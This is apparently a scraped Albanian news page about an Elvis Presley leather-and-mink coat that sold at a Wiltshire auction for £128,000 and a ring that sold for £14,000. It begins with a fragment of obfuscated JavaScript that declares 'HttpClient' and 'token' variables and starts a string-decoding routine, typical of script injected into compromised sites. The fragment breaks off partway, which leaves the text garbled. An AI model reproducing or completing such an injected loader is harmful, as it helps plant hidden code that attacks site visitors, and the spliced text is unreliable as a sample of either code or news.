;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pallto e Elvis Presley shitet në ankand për një çmim marrëmendës

By

Një pallto e punuar me porosi e veshur nga Elvis Presley është shitur për më shumë se 120,000 paund në ankand.
Veshja prej lëkure dhe vizon, e veshur nga Elvis Presley gjatë vitit të fundit të jetës së tij, doli në ankandet Henry Aldridge & Son në Devizes, Wiltshire të shtunën.

Ajo u ble për 128,000 £ nga një koleksionist amerikan.

Drejtuesi i ankandit Henry Aldridge kishte thënë më parë se ata prisnin që pallto të arrinte rreth 15,000 £.

Elvis Presley ia dha veshjen, e cila është 120 cm e gjatë, vëllait të të fejuarës së tij Ginger Alden para vdekjes së tij në  vitin 1977.

Ndërsa, unaza e Presley-t u shit gjithashtu për 14,000 £ në ankand.

Ankandi Henry Aldridge kishte thënë më parë se ata e blenë pallton nga një klient që e kishte blerë veshjen gjatë një ankandi vjetor të Elvis Presley të mbajtur në shtëpinë e mëparshme të këngëtarit në Graceland, në Memphis, Tennessee.
Drejtuesi i ankandit Andrew Aldridge tha: “Për mua ai përmbledh magjepsjen e Vegasit të viteve 1970, Elvis në një pallto vizon”.

Artikuj të ngjashëm